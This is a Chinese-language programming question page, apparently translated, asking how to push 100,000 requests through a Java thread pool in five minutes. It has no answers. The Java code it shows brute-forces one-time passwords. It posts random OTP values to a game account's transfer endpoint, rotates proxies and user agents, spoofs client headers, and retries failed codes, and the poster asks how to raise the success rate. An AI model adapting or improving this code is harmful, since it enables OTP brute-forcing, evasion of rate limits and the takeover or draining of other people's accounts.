使用 ThreadPoolExecutor 在 5 分钟内发出 100000 个请求

g2ieeal7  于 2021-08-25  发布在  Java
关注(0)|答案(0)|浏览(378)

你认为这有可能吗?我使用 java.util.concurrent 和 java.net.HttpURLConnection,让线程池中的每个线程发出请求。但我遇到了一个问题:
有些连接一直没有结束,并且长时间占用所在的线程。我看到线程池没有终止,因为有些线程始终没有执行完毕。
这会占用大量网络带宽,当网速变慢时,几乎所有的请求都会遇到连接超时或读取超时异常。您有更好的解决方案吗?我尝试过异步库,比如 Java 响应式的 WebFlux、io.vertx 的 WebClient,但效果并没有更好。
以下是我的部分代码:

  1. public static void cancelMobile(User user, int split, int start, int end, String nickNameRecv, boolean useProxy, int timeout) {
  2. long startTime = System.currentTimeMillis();
  3. makeRandomOTPQueue(start, end);
  4. int size = 50000;//randomOTP.size();
  5. System.out.println("LUONG: " + split + " TOTAL: " + size);
  6. ArrayBlockingQueue<Runnable> workQueue = new ArrayBlockingQueue<>(size);
  7. RejectedExecutionHandler handler = new ThreadPoolExecutor.DiscardOldestPolicy();
  8. ThreadPoolExecutor threadPoolExecutor = /*(ThreadPoolExecutor) Executors.newCachedThreadPool();*/
  9. new ThreadPoolExecutor(split,
  10. 1000, Long.MAX_VALUE, TimeUnit.NANOSECONDS, workQueue, handler);
  11. ScheduledExecutorService scheduledThreadPoolExecutor = Executors.newScheduledThreadPool(split);
  12. threadPoolExecutor.allowCoreThreadTimeOut(false);
  13. List<TransferSMSOTP> transferSMSOTPList = new LinkedList<>();
  14. for (int j = 0; j < size; j++) {
  15. threadPoolExecutor.submit(new TransferSMSOTP(user, String.valueOf(randomOTP.get(j)),
  16. useProxy ? _Proxy.getRandomProxy(Main._proxy) : null, nickNameRecv, timeout));
  17. // scheduledThreadPoolExecutor.schedule(new TransferSMSOTP(user, String.valueOf(randomOTP.get(j)),
  18. // useProxy ? _Proxy.getRandomProxy(Main._proxy) : null, nickNameRecv, timeout),1000, TimeUnit.MILLISECONDS);
  19. }
  20. threadPoolExecutor.shutdown();
  21. while (!threadPoolExecutor.isTerminated()) {
  22. }
  23. ThreadPoolExecutor poolFail = new ThreadPoolExecutor(split,
  24. randomOTP.size(), 1, TimeUnit.MILLISECONDS, workQueue, handler);
  25. System.out.println("RETRY amount: " + failList.size());
  26. LinkedList<Integer> clone = failList;
  27. System.out.println("waiting pop fail otp");
  28. long backup = System.currentTimeMillis();
  29. for (int i = 0; i < clone.size(); i++) {
  30. try {
  31. poolFail.execute(new TransferSMSOTP(user, String.valueOf(clone.remove()),
  32. useProxy ? _Proxy.getRandomProxy(Main._proxy) : null, nickNameRecv, timeout));
  33. } catch (Exception e) {
  34. System.out.println("cannot pop: " + e.getMessage());
  35. }
  36. // if (System.currentTimeMillis() - backup > TimeUnit.MINUTES.toMillis(2)) {
  37. // System.out.println("Exit pop");
  38. // poolFail.shutdownNow();
  39. // }
  40. }
  41. poolFail.shutdown();
  42. System.out.println("waiting handle failed otp");
  43. while (!poolFail.isTerminated()) {
  44. if (System.currentTimeMillis() - startTime > TimeUnit.MINUTES.toMillis(5)) {
  45. System.out.println("Exit fail handle");
  46. poolFail.shutdownNow();
  47. // System.exit(0);
  48. break;
  49. }
  50. }
  51. System.out.println("UNHANDLED amount: " + failList.size() + ", total time of job: " + (System.currentTimeMillis() - startTime));
  52. }

在我的runnable类中:

  1. public void run() {
  2. try {
  3. String url = this.user.getServer().getUrlTransfer();
  4. Document data = new Document();
  5. data.put("nickNameRecv", this.nickNameRecv);
  6. data.put("otp", otp);
  7. String authorization = "Bearer " +
  8. this.user.getAuth();
  9. URL urlCon = new URL(url);
  10. HttpURLConnection connection;
  11. final String authUser = this._proxy.getProxyUserName();
  12. final String authPassword = this._proxy.getProxyPassword();
  13. Authenticator.setDefault(new ProxyAuthenticator(authUser, authPassword));
  14. Proxy proxy = new Proxy(Proxy.Type.HTTP, new InetSocketAddress(this._proxy.getProxyHost(), this._proxy.getProxyPort()));
  15. if (_proxy == null)
  16. connection = (HttpURLConnection) urlCon.openConnection();
  17. else
  18. connection = (HttpURLConnection) urlCon.openConnection(proxy);
  19. connection.setRequestMethod("POST");
  20. connection.setConnectTimeout(timeout);
  21. connection.setReadTimeout(timeout);
  22. connection.setRequestProperty(HttpHeaders.ACCEPT, ContentType.APPLICATION_JSON.toString());
  23. connection.setRequestProperty(HttpHeaders.CONTENT_TYPE, ContentType.APPLICATION_JSON.toString());
  24. connection.setRequestProperty(HttpHeaders.AUTHORIZATION, authorization);connection.setRequestProperty("client-browser", "Chrome 83");
  25. // connection.setRequestProperty("client-deviceid", rand(32, -1, "abcdef1234567890"));
  26. connection.setRequestProperty("client-operatingsystem", "Windows");
  27. String param = data.toJson();
  28. connection.setRequestProperty("Content-Length", String.valueOf(param.length()));
  29. connection.setRequestProperty(HttpHeaders.USER_AGENT, Main.agent.get(new Random().nextInt(Main.agent.size())));
  30. connection.setDoOutput(true);
  31. OutputStream outputStream = connection.getOutputStream();
  32. outputStream.write(param.getBytes());
  33. InputStream inputStream = connection.getInputStream();
  34. ObjectMapper mapper = new ObjectMapper();
  35. Map res = mapper.readValue(inputStream, Map.class);
  36. outputStream.close();
  37. inputStream.close();
  38. connection.disconnect();
  39. ProcessGame.done++;
  40. Main.f.updateResult();
  41. } catch (Exception e) {
  42. ProcessGame.failList.add(Integer.parseInt(this.otp));
  43. }
  44. }

我得到的最好结果是 99999 个请求中大约有 20000 个返回 HTTP 状态码 200。有没有更好的解决方案?

暂无答案!

目前还没有任何答案,快来回答吧!

相关问题